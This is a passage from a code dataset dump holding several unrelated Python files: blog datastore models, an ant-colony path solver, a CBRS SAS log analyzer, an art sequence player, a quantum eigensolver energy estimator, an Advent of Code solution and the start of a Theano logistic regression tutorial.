dep)\r\n\r\n def get_deps(self, regenerate=False):\r\n if not self.deps:\r\n self.deps = {}\r\n for generator_class in generators.generator_list:\r\n new_deps = set(generator_class.get_resource_list(self))\r\n new_etag = generator_class.get_etag(self)\r\n old_deps, old_etag = self.deps.get(generator_class.name(), (set(), None))\r\n if new_etag != old_etag or regenerate:\r\n # If the etag has changed, regenerate everything\r\n to_regenerate = new_deps | old_deps\r\n else:\r\n # Otherwise just regenerate the changes\r\n to_regenerate = new_deps ^ old_deps\r\n self.deps[generator_class.name()] = (new_deps, new_etag)\r\n yield generator_class, to_regenerate\r\n\r\nclass Page(db.Model):\r\n # The URL path to the page.\r\n path = db.StringProperty(required=True)\r\n title = db.TextProperty(required=True)\r\n template = db.StringProperty(required=True)\r\n body = db.TextProperty(required=True)\r\n created = db.DateTimeProperty(required=True, auto_now_add=True)\r\n updated = db.DateTimeProperty()\r\n\r\n @property\r\n def rendered(self):\r\n # Returns the rendered body.\r\n return markup.render_body(self)\r\n\r\n @property\r\n def hash(self):\r\n val = (self.path, self.body, self.published)\r\n return hashlib.sha1(str(val)).hexdigest()\r\n\r\n def publish(self):\r\n self._key_name = self.path\r\n self.put()\r\n generators.PageContentGenerator.generate_resource(self, self.path);\r\n\r\n def remove(self):\r\n if not self.is_saved(): \r\n return\r\n self.delete()\r\n generators.PageContentGenerator.generate_resource(self, self.path, action='delete')\r\n\r\nclass VersionInfo(db.Model):\r\n bloggart_major = db.IntegerProperty(required=True)\r\n bloggart_minor = db.IntegerProperty(required=True)\r\n bloggart_rev = db.IntegerProperty(required=True)\r\n\r\n @property\r\n def bloggart_version(self):\r\n return (self.bloggart_major, self.bloggart_minor, self.bloggart_rev)\r\n\r\nclass TagCounter(db.Model):\r\n tagname = db.StringProperty(required=True)\r\n tagcount = db.IntegerProperty(required=True, default=0)\r\n\r\n @property\r\n def tag_and_count(self):\r\n return (utils.slugify(self.tagname.lower()), self.tagcount)\r\n \r\n @classmethod\r\n def create_for_post(cls, post):\r\n import logging\r\n for tag in post.normalized_tags:\r\n logging.debug('TagCounter.create_for_post in models.py, tag = ' + tag)\r\n inst = TagCounter.get_by_key_name(key_names=str(tag))\r\n if not inst:\r\n inst = TagCounter(key_name=str(tag), tagname=str(tag), tagcount=0)\r\n inst.tagcount += 1\r\n inst.put()\r\n \r\nclass UserPrefs(db.Model):\r\n user = db.UserProperty()\r\n name = db.StringProperty()\r\n postscount = db.IntegerProperty(required=True, default=0)\r\n namepath = db.StringProperty() # Unique URL path made from name + a number if necessary.\r\n\r\n @property\r\n def name_and_count(self):\r\n return (namepath, self.postscount)\r\n\r\n def publish(self):\r\n if not self.namepath:\r\n num = 0\r\n content = None\r\n while not content:\r\n \"\"\" Tries to find a unique URL for this user, and adds the content\r\n to the datastore when it finds one. \"\"\"\r\n path = utils.format_user_path(self, num)\r\n content = static.add(path, '', config.html_mime_type)\r\n num += 1\r\n self.namepath = path\r\n self.put()\r\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"372936757","text":"from graph import Graph\nfrom AntColony import AntColony\n\ncolony_size = 25\niters_num = 10\n\ng = Graph(\"graph18_1.txt\")\ncolony = AntColony(colony_size, g, g.destination)\nresult = colony.find_best_path(iters_num)\nwith open(\"output.txt\", 'w') as f:\n f.write(\"Min path length: \" + str(result[0]) + \"\\n\")\n f.write(\"Possible paths (node - (weight) - node: \\n\")\n for path in result[1]:\n for i in range(len(path)-1):\n f.write(str(path[i]) + \" - (\" + str(g.get_weight(path[i], path[i+1])) +\n \") - \")\n f.write(str(path[-1]) + \"\\n\")\n\n f.write(\"All graph (node-from, node-to: weight): \\n\")\n n = g.get_node_list()\n for i in n:\n for j in n:\n w = g.get_weight(i, j)\n if w is not None:\n f.write(str(i) + ', ' + str(j) + ': ' + str(w) + '\\n')\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"497605181","text":"\n'''\n\nSAS Log Analyzer\n\n'''\n\n\nimport re\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nhbt_req = \"{\\\"heartbeatRequest\\\":[\"\nhbt_res = \"responseEntity=<200,{\\\"heartbeatResponse\\\":[\"\ngrnt_req = \"{\\\"grantRequest\\\":[{\"\n#grnt_resp = \"{\\\"grantResponse\\\":[{\"\ngrnt_resp = \"responseBody={\\\"grantResponse\\\":\"\n\nprint(\"Working... please wait\")\n\nfh_req = open('dp.cbrs_2019_03_05.log')\nfh_res = open('dp.cbrs_2019_03_05.log')\nfh_grnt = open('dp.cbrs_2019_03_05.log')\nfh_grnt_res = open('dp.cbrs_2019_03_05.log')\n\n\n##fh_req = open('dp.cbrs_2019_01_18_from_ravi.log')\n##fh_res = open('dp.cbrs_2019_01_18_from_ravi.log')\n##fh_grnt = open('dp.cbrs_2019_01_18_from_ravi.log')\n##fh_grnt_res = open('dp.cbrs_2019_01_18_from_ravi.log')\n\n##fh_req = open('dp.cbrs_2019_01_24.log')\n##fh_res = open('dp.cbrs_2019_01_24.log')\n##fh_grnt = open('dp.cbrs_2019_01_24.log')\n##fh_grnt_res = open('dp.cbrs_2019_01_24.log')\n\n\n#fh_req = open('dp.cbrs_2019_01_18_Grant_failed_CBSD cannot be granted for the given frequency range.log')\n#fh_res = open('dp.cbrs_2019_01_18_Grant_failed_CBSD cannot be granted for the given frequency range.log')\n#fh_grnt = open('dp.cbrs_2019_01_18_Grant_failed_CBSD cannot be granted for the given frequency range.log')\n#fh_grnt_res = open('dp.cbrs_2019_01_18_Grant_failed_CBSD cannot be granted for the given frequency range.log')\n\n \ncbsd_Id = []\ngrant_Id = []\nop_state = []\ngrnt_renew = []\ntime_stamp = []\nsas_id = []\n\n\ncbsd_Id_hb_res = []\ngrant_Id_hb_res = []\ntime_stamp_hb_res = []\nsas_id_hb_res = []\ntransmitExpireTime= []\ngrantExpireTime = []\nheartbeatInterval = []\nresponseCode = []\nresp_data = []\ncbsd_test = []\n\ncbsd_id_grnt_req = []\nmeas_report_grnt_req = []\ntime_stamp_grnt_req = []\nsas_id_grnt_req = []\n\ncbsd_id_grnt_res = []\ngrant_id_res = []\ntime_stamp_grnt_res = []\nsas_id_grnt_res = []\n\n\n\n\ndef hbt_request():\n for ln in fh_req:\n if hbt_req in ln:\n for cbsdId in re.finditer('cbsdId', ln):\n cbsdId = cbsdId.end()\n\n fccid = ln[cbsdId + 3 : cbsdId + 29]\n cbsd_Id.append(fccid)\n\n grantId = ln[cbsdId + 40: cbsdId + 53]\n grant_Id.append(grantId)\n\n opstate = ln[cbsdId + 73: cbsdId + 83]\n op_state.append(opstate)\n\n grntrenew = ln[cbsdId + 98 :cbsdId + 102]\n grnt_renew.append(grntrenew)\n\n timestamp = ln[0:21]\n time_stamp.append(timestamp)\n\n sasId = ln[23:40]\n sas_id.append(sasId)\n\n #break\n \n\nhbt_request() \ndf_hb_req = pd.DataFrame({'time_stamp_req':time_stamp, 'sas_id_req':sas_id, 'cbsdId_req':cbsd_Id, 'grantId_req':grant_Id, \n 'operational_state':op_state, 'grant_renew':grnt_renew })\n\ndf_hb_req.to_csv('hbt_req_test.csv') \ndf_hb_req.head()\n\n\ndef hbt_response():\n for ln in fh_res:\n if hbt_res in ln:\n for cbsdId in re.finditer('cbsdId', ln):\n cbsdId = cbsdId.end()\n \n fccid = ln[cbsdId + 3 : cbsdId + 29]\n cbsd_Id_hb_res.append(fccid)\n \n grantId = ln[cbsdId + 40: cbsdId + 53]\n grant_Id_hb_res.append(grantId)\n \n tras_exp = ln[cbsdId + 75: cbsdId + 98]\n transmitExpireTime.append(tras_exp)\n \n grnt_exp = ln[cbsdId + 115: cbsdId + 140]\n grantExpireTime.append(grnt_exp)\n \n \n response_msg = ln[cbsdId + 140: cbsdId + 260]\n resp_data.append(response_msg)\n \n \n time_stamp = ln[0:23]\n time_stamp_hb_res.append(time_stamp)\n \n sas_id = ln[23:40]\n sas_id_hb_res.append(sas_id)\n \n #break\n \n \n \n \nhbt_response()\n\ndf_hb_res = pd.DataFrame({'time_stamp_res':time_stamp_hb_res, 'sas_id_res':sas_id_hb_res, 'cbsdId_res':cbsd_Id_hb_res, 'grantId_res':grant_Id_hb_res, \n 'transmit_exp':transmitExpireTime,'grant_exp':grantExpireTime, 'resp_data':resp_data})\n\ndf_hb_res.to_csv('hbt_response_test.csv')\ndf_hb_res.head()\n\n\ndef grant_req():\n for ln in fh_grnt:\n if grnt_req in ln:\n for cbsdId in re.finditer('cbsdId', ln):\n cbsdId = cbsdId.end()\n \n fccid = ln[cbsdId + 3 : cbsdId + 29]\n cbsd_id_grnt_req.append(fccid)\n \n time_stamp = ln[0:23]\n time_stamp_grnt_req.append(time_stamp)\n\n sas_id = ln[23:40]\n sas_id_grnt_req.append(sas_id)\n\n measReport = ln[cbsdId + 29 : ]\n meas_report_grnt_req.append(measReport)\n \n \ngrant_req()\ndf_grnt_req = pd.DataFrame({'time_stamp_grnt_req':time_stamp_grnt_req, 'sas_id_grnt_req':sas_id_grnt_req, 'cbsd_id_grnt_req':cbsd_id_grnt_req, 'measReport':meas_report_grnt_req})\ndf_grnt_req.to_csv('grnt_req.csv')\n\ndef grant_res():\n for ln in fh_grnt_res:\n if grnt_resp in ln:\n for cbsdId in re.finditer('cbsdId', ln):\n cbsdId = cbsdId.end()\n\n fccid = ln[cbsdId + 3 : cbsdId + 29]\n cbsd_id_grnt_res.append(fccid)\n\n time_stamp = ln[0:23]\n time_stamp_grnt_res.append(time_stamp)\n \n sas_id = ln[23:40]\n sas_id_grnt_res.append(sas_id)\n \n grnt_id_res = ln[cbsdId: ]\n grant_id_res.append(grnt_id_res)\n \n \n\ngrant_res()\ndf_grnt_res = pd.DataFrame({'time_stamp_grnt_res':time_stamp_grnt_res, 'sas_id_grnt_res':sas_id_grnt_res, \n 'cbsdId_res':cbsd_id_grnt_res, 'grant_id_res':grant_id_res})\ndf_grnt_res.to_csv('grnt_res.csv')\nprint(df_grnt_res['grant_id_res'])\n\n#print(cbsd_id_grnt_res)\n#print(grant_id_res)\n#print(sas_id_grnt_res)\n\n\n\n\n\n#clean-up\n\ndf_hb_req['sas_id_req'] = df_hb_req['sas_id_req'].map(lambda x: x.rstrip('} b'))\ndf_hb_req['cbsdId_req'] = df_hb_req['cbsdId_req'].map(lambda x: x.rstrip('\",'))\ndf_hb_req['operational_state'] = df_hb_req['operational_state'].map(lambda x: x.rstrip('\",\"'))\ndf_hb_req['grant_renew'] = df_hb_req['grant_renew'].replace(to_replace=\"e}]}\", value = \"TRUE\")\ndf_hb_req['grant_renew'] = df_hb_req['grant_renew'].replace(to_replace=\"e},{\", value = \"TRUE\")\n\ndf_hb_res['time_stamp_res'] = df_hb_res['time_stamp_res'].map(lambda x: x.rstrip(' {'))\ndf_hb_res['sas_id_res'] = df_hb_res['sas_id_res'].map(lambda x: x.rstrip('} S'))\ndf_hb_res['cbsdId_res'] = df_hb_res['cbsdId_res'].map(lambda x: x.rstrip('\",'))\ndf_hb_res['transmit_exp'] = df_hb_res['transmit_exp'].map(lambda x: x.lstrip(':\"').rstrip('\"'))\ndf_hb_res['grant_exp'] = df_hb_res['grant_exp'].map(lambda x: x.lstrip('\":\"').rstrip('\",'))\n\ndf_grnt_req['time_stamp_grnt_req'] = df_grnt_req['time_stamp_grnt_req'].map(lambda x: x.rstrip(' {'))\ndf_grnt_req['sas_id_grnt_req'] = df_grnt_req['sas_id_grnt_req'].map(lambda x: x.rstrip('}'))\ndf_grnt_req['sas_id_grnt_req'] = df_grnt_req['sas_id_grnt_req'].map(lambda x: x.rstrip('} b'))\ndf_grnt_req['cbsd_id_grnt_req'] = df_grnt_req['cbsd_id_grnt_req'].map(lambda x: x.rstrip('\",'))\n\ndf_grnt_res['time_stamp_grnt_res'] = df_grnt_res['time_stamp_grnt_res'].map(lambda x: x.rstrip(' {'))\ndf_grnt_res['sas_id_grnt_res'] = df_grnt_res['sas_id_grnt_res'].map(lambda x: x.rstrip('}'))\ndf_grnt_res['cbsdId_res'] = df_grnt_res['cbsdId_res'].map(lambda x: x.rstrip('\",'))\n\n\n\n#combine hb_req_res\n\nhb_req_res = pd.concat([df_hb_req, df_hb_res], join='outer', sort=False, axis=1)\nhb_req_res.to_csv('hb_req_res.csv')\n\n# combine grnt_req_res\ngrnt_req_res = pd.concat([df_grnt_req, df_grnt_res], join= 'outer', sort=False, axis=1)\ngrnt_req_res.to_csv('grnt_req_res.csv')\n\n\nprint(\"DONE\")\n\n\n\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n\ndef grant_res():\n for ln in fh_grnt_res:\n if grnt_resp in ln:\n for cbsdId in re.finditer('cbsdId', ln):\n cbsdId = cbsdId.end()\n\n fccid = ln[cbsdId + 3 : cbsdId + 29]\n cbsd_id_grnt_res.append(fccid)\n\n time_stamp = ln[0:23]\n time_stamp_grnt_res.append(time_stamp)\n \n sas_id = ln[23:40]\n sas_id_grnt_res.append(sas_id)\n \n grnt_id_res = ln[cbsdId: ]\n grant_id_res.append(grnt_id_res)\n \n \n\ngrant_res()\ndf_grnt_res_test = pd.DataFrame({'time_stamp_grnt_res':time_stamp_grnt_res, 'sas_id_grnt_res':sas_id_grnt_res, \n 'cbsdId_res':cbsd_id_grnt_res, 'grant_id_res':grant_id_res})\n\ndf_grnt_fail = df_grnt_res_test[df_grnt_res_test['grant_id_res'].str.contains('grant failed')]\ndf_grnt_fail.tail()\ndf_grnt_fail.to_csv('grnt_failures.csv')\n\n#df_grnt_fail = df_grnt_res_test[df_grnt_res_test['grant_id_res'].str.contains('400')]\n#df_grnt_fail.tail()\n#df_grnt_fail.to_csv('grnt_400.csv')\n\n\n#df_grnt_fail = df_grnt_res_test[df_grnt_res_test['grant_id_res'].str.contains('103')]\n#df_grnt_fail.tail()\n#df_grnt_fail.to_csv('grnt_103.csv')\n\ndf_grnt_success = df_grnt_res_test[df_grnt_res_test['grant_id_res'].str.contains('GAA')]\ndf_grnt_success.tail()\ndf_grnt_success.to_csv('grnt_sucess.csv')\n\ngrnt_fail_count = len(df_grnt_fail)\nprint(\"Failed Grants\", grnt_fail_count)\n\ngrnt_success_count = len(df_grnt_success)\nprint(\"Sucessful Grants\", grnt_success_count)\n\ntotal = grnt_fail_count + grnt_success_count\nprint(\"Total\",total)\n\ndf_grnt_analysis = pd.DataFrame({'total':[total], 'grnt_success_count':[grnt_success_count], 'grnt_fail_count':[grnt_fail_count]})\n\n\n\nplt.plot(df_grnt_analysis)\nplt.ylabel('Count')\nplt.title('Grant Summary')\n\nplt.show()\n\n\n\n\n","sub_path":"sas_log_analyzer_v10_clean_up_response_data.py","file_name":"sas_log_analyzer_v10_clean_up_response_data.py","file_ext":"py","file_size_in_byte":9960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"227165445","text":"#!/usr/bin/python\n\nimport argparse\nimport configparser\nimport getopt\nimport os\nimport sys\nimport time\nimport math\nimport random\n\nimport noise\n\nfrom PIL import (\n\tImage,\n\tImageChops,\n\tImageDraw,\n\tImageEnhance,\n\tImageFilter,\n\tImageFont,\n\tImageOps,\n)\n\nfrom modules import configuration, player\nfrom modules.rendering import appWindow\nfrom modules.configuration import bcolors\n\n\n\n\ndef timeChecker(sequenceConfig, config) :\n\tsequenceConfig.currentTime = time.time()\n\n\tif sequenceConfig.currentTime - sequenceConfig.startTime > sequenceConfig.currentPieceDuration :\n\t\tsequenceConfig.startTime = time.time()\n\n\t\tif sequenceConfig.playInOrder == True :\n\t\t\tsequenceConfig.playOrder += 1\n\t\t\tif sequenceConfig.playOrder >= len(sequenceConfig.workList) :\n\t\t\t\tsequenceConfig.playOrder = 0\n\t\t\tpieceToPlay = sequenceConfig.playOrder\n\t\telse :\n\t\t\tpieceToPlay = round(random.uniform(0, len(sequenceConfig.workList)-1))\n\n\t\tprint(\"Piece Playing is: \" + str(pieceToPlay))\n\n\t\tsequenceConfig.currentPieceDuration = random.uniform(sequenceConfig.workList[pieceToPlay][1], sequenceConfig.workList[pieceToPlay][2])\n\t\tloadWorkConfig(sequenceConfig.workList[pieceToPlay], sequenceConfig)\n\n\ndef loadWorkConfig(work, sequenceConfig):\n\n\tworkconfig = configparser.ConfigParser()\n\tconfig = configuration.Config()\n\tconfig.startTime = time.time()\n\tconfig.currentTime = time.time()\n\tconfig.reloadConfig = False\n\tconfig.doingReload = False\n\tconfig.checkForConfigChanges = False\n\tconfig.brightnessOverride = work[3]\n\n\tconfig.renderImageFull = sequenceConfig.renderImageFull\n\tconfig.isRunning = True\n\t# This is so the Player does not create a window\n\tconfig.standAlone = False\n\tconfig.callBack = lambda : timeChecker(sequenceConfig, config)\n\n\tconfig.MID = \"\"\n\tconfig.path = sequenceConfig.path\n\n\targument = config.path + \"/configs/\" + sequenceConfig.workListDirectory + work[0]\n\n\tprint(bcolors.WARNING + \"** \")\n\tprint(\"Sequencer: \" + work[0] + \":\" + argument)\n\tprint(bcolors.ENDC)\n\tworkconfig.read(argument)\n\tconfig.fileName = argument\n\tsequenceConfig.playCount=sequenceConfig.playCount+1\n\tprint(\"==========> count play : \" + str(sequenceConfig.playCount))\n\n\tif (sequenceConfig.playCount > sequenceConfig.repeatCountTrigger) :\n\t\t# Clean threads!\n\t\tos.system( config.path + sequenceConfig.restartScript)\n\n\n\t# ****************************************** #\n\t# Sets off the piece based on loading the initiail configs #\n\t# ****************************************** #\n\tplayer.configure(config, workconfig)\n\tconfig.cnvs = sequenceConfig.cnvs\n\tsequenceConfig.mainAppWindow.startWork(config.workRefForSequencer)\n\n\n\ndef loadConfigFile():\n\tparser = argparse.ArgumentParser(description=\"Process\")\n\tparser.add_argument(\"-mname\", type=str, default=\"local\", help=\"machine name (optional)\")\n\tparser.add_argument(\"-path\", type=str, default=\"./\", help=\"directory (optional)\")\n\tparser.add_argument(\n\t\t\"-cfg\",\n\t\ttype=str,\n\t\trequired=False,\n\t\thelp=\"Config File - just need sub-folder and name - e.g. p4-6x5/repeater.cfg\",\n\t)\n\tparser.add_argument(\n\t\t\"-brightnessOverride\",\n\t\ttype=int,\n\t\thelp=\"brightness param to override the config value (optional)\",\n\t)\n\targs = parser.parse_args()\n\treturn args\n\n\"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\ndef loadSequenceFile():\n\n\targs = loadConfigFile()\n\n\tif args.cfg != None:\n\n\t\tworkconfig = configparser.ConfigParser()\n\n\t\tprint(bcolors.OKBLUE + \"** \" + str(args) + \"\" + bcolors.ENDC)\n\t\tsequenceConfig = configuration.Config()\n\t\tsequenceConfig.startTime = time.time()\n\t\tsequenceConfig.currentTime = time.time()\n\t\tsequenceConfig.MID = args.mname\n\t\tsequenceConfig.path = args.path\n\n\t\targument = sequenceConfig.path + \"/configs/\" + args.cfg # + \".cfg\"\n\t\tworkconfig.read(argument)\n\n\t\tsequenceConfig.fileName = argument\n\t\tsequenceConfig.fileNameRaw = args.cfg\n\n\t\tsequenceConfig.imageXOffset = int(workconfig.get(\"displayconfig\", \"imageXOffset\"))\n\t\tsequenceConfig.imageYOffset = int(workconfig.get(\"displayconfig\", \"imageYOffset\"))\n\n\t\tsequenceConfig.canvasOffsetX = int(workconfig.get(\"displayconfig\", \"canvasOffsetX\"))\n\t\tsequenceConfig.canvasOffsetY = int(workconfig.get(\"displayconfig\", \"canvasOffsetY\"))\n\n\t\tsequenceConfig.screenHeight = int(workconfig.get(\"displayconfig\", \"screenHeight\"))\n\t\tsequenceConfig.screenWidth = int(workconfig.get(\"displayconfig\", \"screenWidth\"))\n\n\t\tsequenceConfig.windowXOffset = int(workconfig.get(\"displayconfig\", \"windowXOffset\"))\n\t\tsequenceConfig.windowYOffset = int(workconfig.get(\"displayconfig\", \"windowYOffset\"))\n\n\n\t\tsequenceConfig.playInOrder = (workconfig.getboolean(\"displayconfig\", \"playInOrder\"))\n\t\tsequenceConfig.playOrder = 0 \n\n\t\ttry:\n\t\t\tsequenceConfig.forceBGSwap = (workconfig.getboolean(\"displayconfig\", \"forceBGSwap\"))\n\t\texcept Exception as e:\n\t\t\tprint(str(e))\n\t\t\tsequenceConfig.forceBGSwap = False\n\n\t\tsequenceConfig.workListDirectory = workconfig.get(\"displayconfig\", \"workListDirectory\")\n\t\tsequenceConfig.workListManifest = list(workconfig.get(\"displayconfig\",\"workList\").split(','))\n\t\tsequenceConfig.currentPieceDuration = 1\n\t\tsequenceConfig.playCount = 0\n\n\t\ttry:\n\t\t\tsequenceConfig.restartScript = workconfig.get(\"displayconfig\", \"restartScript\")\n\t\t\tsequenceConfig.repeatCountTrigger = int(workconfig.get(\"displayconfig\", \"repeatCountTrigger\"))\n\t\texcept Exception as e:\n\t\t\tprint(str(e))\n\t\t\tsequenceConfig.restartScript = '/cntrlscripts/restart_full_sequencer.sh'\n\t\t\tsequenceConfig.repeatCountTrigger = 100\n\n\n\t\tsequenceConfig.workList = []\n\n\t\tfor w in sequenceConfig.workListManifest :\n\t\t\twork = workconfig.get(w, \"work\")\n\t\t\tminDuration = int(workconfig.get(w, \"minDuration\"))\n\t\t\tmaxDuration = int(workconfig.get(w, \"maxDuration\"))\n\t\t\ttry:\n\t\t\t\tbrightnessOverride = float(workconfig.get(w,\"brightnessOverride\"))\n\t\t\texcept Exception as e:\n\t\t\t\tprint(str(e))\n\t\t\t\tbrightnessOverride = None\n\n\n\t\t\tsequenceConfig.workList.append([work,minDuration,maxDuration,brightnessOverride])\n\n\n\t\tprint(sequenceConfig.workList)\n\n\n\t\tsequenceConfig.mainAppWindow = appWindow.AppWindow(sequenceConfig)\n\t\tsequenceConfig.mainAppWindow.setUp()\n\t\tsequenceConfig.mainAppWindow.createMainCanvas()\n\n\t\tpieceToPlay = round(random.uniform(0, len(sequenceConfig.workList)-1))\n\t\tpieceToPlay = 0\n\t\tloadWorkConfig(sequenceConfig.workList[pieceToPlay], sequenceConfig)\n\n\t\t#sequenceConfig.mainAppWindow.run()\n\n\n\n\ndef main():\n\tglobal config, threads\n\n\tloadSequenceFile()\n\t\n\t\"\"\"\n\t# Threading now handled by renderer - e.g. see modules/rendertohub.py\n\tthrd = threading.Thread(target=configure)\n\tthreads.append(thrd)\n\tthrd.start()\n\t\"\"\"\n\n\n# Kick off .......\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"sequence-player.py","file_name":"sequence-player.py","file_ext":"py","file_size_in_byte":6504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"90842719","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Variational Quantum Eigensolver. \"\"\"\n\nimport logging\n\nfrom qutip.qip.circuit import QubitCircuit\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef _estimate_outcome_probabilities(qc, initial_state, shots):\n \"\"\" Run a circuit a number of times and estimate the probabilities of\n each outcome.\n\n :param QubitCircuit qc:\n The circuit to run. The circuit should contain a single\n measurement and store its result in `.cbits[0]`.\n :param Qobj initial_state:\n The initial state to run the circuit on.\n :param int shots:\n The number of runs to perform.\n\n :return list:\n A list containing the fraction of runs that returned measurements\n 0 and 1.\n \"\"\"\n outcome_counts = [0, 0]\n for _ in range(shots):\n qc.run(state=initial_state)\n result = qc.cbits[0]\n outcome_counts[result] += 1\n return [outcome_counts[0] / shots, outcome_counts[1] / shots]\n\n\ndef _analytic_outcome_probabilities(qc, initial_state):\n \"\"\" Calculate the probabilities of each outcome analytically.\n\n :param QubitCircuit qc:\n The circuit to run. The circuit should contain a single\n measurement and store its result in `.cbits[0]`.\n :param Qobj initial_state:\n The initial state to run the circuit on.\n\n :return list:\n A list containing the probabilities of measurement outcomes 0 and 1.\n \"\"\"\n states, state_probs = qc.run_statistics(initial_state)\n return state_probs\n\n\ndef estimate_energy(\n h_coeffs,\n h_measurement_circuits,\n initial_state,\n ansatz_circuit,\n shots=100,\n analytical=False,\n):\n \"\"\" Estimate the energy of a given state for a specified Hamiltonian.\n\n :param dict h_coeffs:\n The Pauli decomposition of the Hamiltonian. This specifies the\n Hamiltonian. If you have an operator `H` then\n `vqefs.pauli.decompse(H)` will return the required dictionary of\n coefficients.\n :param dict h_measurement_circuits:\n The dictionary of measurement operators for each of the Pauli\n coefficients in `h_coeffs`. If you have a dictionary of coefficients,\n the measurement circuits may be constructed using::\n\n h_measurement_circuits = {\n indices: vqefs.pauli.measurement_circuit(indices)\n for indices in h2d_coeffs\n }\n :param Qobj initial_state:\n The initial state to pass to the completed circuit when it is run.\n :param QubitCircuit ansatz_circuit:\n The circuit used to evolve the initial_state into the prepared state\n which will be measured.\n :param int shots:\n How many times to run and measure each circuit. Default: 100.\n :param bool analytical:\n If True, calculate the probabilities analytically using\n `QubitCircuit.run_statistics(...)`. If False, run the\n circuit multiple times with `QubitCircuit.run(...)`.\n Default: False.\n\n :return float:\n The estimated energy of the prepared state.\n \"\"\"\n energy = 0\n N = len(initial_state.dims[0]) # number of qubits\n sign = (N == 1) and 1 or -1\n for indices, coeff in h_coeffs.items():\n if indices == \"I\" * N:\n energy_term = 1\n logger.info(\n \"%s: coeff: %g, energy: %g\", indices, coeff, energy_term,\n )\n else:\n qc = QubitCircuit(N=N, num_cbits=1)\n qc.add_circuit(ansatz_circuit)\n qc.add_circuit(h_measurement_circuits[indices])\n qc.add_measurement(\"M\", targets=[0], classical_store=0)\n if analytical:\n p0, p1 = _analytic_outcome_probabilities(qc, initial_state)\n else:\n p0, p1 = _estimate_outcome_probabilities(qc, initial_state, shots=shots)\n energy_term = sign * ((-1 * p0) + (+1 * p1))\n logger.info(\n \"%s: coeff: %g, energy: %g, probabilities: (%g, %g)\",\n indices,\n coeff,\n energy_term,\n p0,\n p1,\n )\n energy += coeff * energy_term\n return energy\n","sub_path":"vqefs/vqe.py","file_name":"vqe.py","file_ext":"py","file_size_in_byte":4314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"559366620","text":"# --- Day 6: Custom Customs ---\n\ndef answers(person):\n return set(answer for answer in person)\n\n\ndef anyone_yes(group):\n s = set()\n for person in group:\n s.update(answers(person))\n return len(s)\n\n\ndef everyone_yes(group):\n s = set(answers(group[0]))\n for person in group[1:]:\n s = s.intersection(answers(person))\n return len(s)\n\n\ndef read_groups():\n groups = []\n with open('../res/day06.txt') as file:\n lines = file.read().splitlines()\n lines.append('') # add last empty line\n group = []\n for line in lines:\n if line:\n group.append(line)\n else:\n groups.append(group)\n group = []\n return groups\n\n\nif __name__ == '__main__':\n print('Day 6: Custom Customs')\n print('---------------------')\n\n count_a = 0\n count_b = 0\n\n for group in read_groups():\n count_a += anyone_yes(group)\n count_b += everyone_yes(group)\n\n print(f'Sum (anyone): {count_a}')\n print(f'Sum (everyone): {count_b}')\n","sub_path":"src/day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"153226672","text":"\"\"\"\r\nThis tutorial introduces logistic regression using Theano and stochastic\r\ngradient descent.\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\n\r\n__docformat__ = 'restructedtext en'\r\n\r\nimport six.moves.cPickle as pickle\r\nimport gzip\r\nimport os\r\nimport sys\r\nimport timeit\r\n\r\nimport numpy\r\n\r\nimport theano\r\nimport theano.tensor as T\r\n\r\nimport pdb\r\n\r\nclass LogisticRegression(object):\r\n \"\"\"Multi-class Logistic Regression Class\r\n \"\"\"\r\n\r\n def __init__(self, input, n_in, n_out):\r\n \"\"\" Initialize the parameters of the logistic regression\r\n\r\n :type input: theano.tensor.TensorType\r\n :param input: symbolic variable that describes the input of the\r\n architecture (one minibatch)\r\n\r\n :type n_in: int\r\n :param n_in: number of input units, the dimension of the space in\r\n which the datapoints lie\r\n\r\n :type n_out: int\r\n :param n_out: number of output units, the dimension of the space in\r\n which the labels lie\r\n\r\n \"\"\"\r\n # start-snippet-1\r\n # initialize with 0 the weights W as a matrix of shape (n_in, n_out)\r\n self.W = theano.shared(\r\n value=numpy.zeros(\r\n (n_in, n_out),\r\n dtype=theano.config.floatX\r\n ),\r\n name='W',\r\n borrow=True\r\n )\r\n # initialize the biases b as a vector of n_out 0s\r\n self.b = theano.shared(\r\n value=numpy.zeros(\r\n (n_out,),\r\n dtype=theano.config.floatX\r\n ),\r\n name='b',\r\n borrow=True\r\n )\r\n\r\n # W is a matrix where column-k represent the separation hyperplane for\r\n # class-k\r\n # x is a matrix where row-j represents input training sample-j\r\n # b is a vector where element-k represent the free parameter of\r\n # hyperplane-k\r\n self.p_y_given_x = T.nnet.softmax(T.dot(input, self.W) + self.b)\r\n\r\n # symbolic description of how to compute prediction as class whose\r\n # probability is maximal\r\n self.y_pred = T.argmax(self.p_y_given_x, axis=1)\r\n # end-snippet-1\r\n\r\n # parameters of the model\r\n self.params = [self.W, self.b]\r\n\r\n # keep track of model input\r\n self.input = input\r\n\r\n def negative_log_likelihood(self, y):\r\n \"\"\"Return the mean of the negative log-likelihood of the prediction\r\n of this model under a given target distribution.\r\n\r\n :type y: theano.tensor.TensorType\r\n :param y: corresponds to a vector that gives for each example the\r\n correct label\r\n\r\n Note: we use the mean instead of the sum so that\r\n the learning rate is less dependent on the batch size\r\n \"\"\"\r\n # start-snippet-2\r\n # y.shape[0] is the number of rows (N)\r\n # T.arange(y.shape[0]) is a symbolic vector which will contain\r\n # 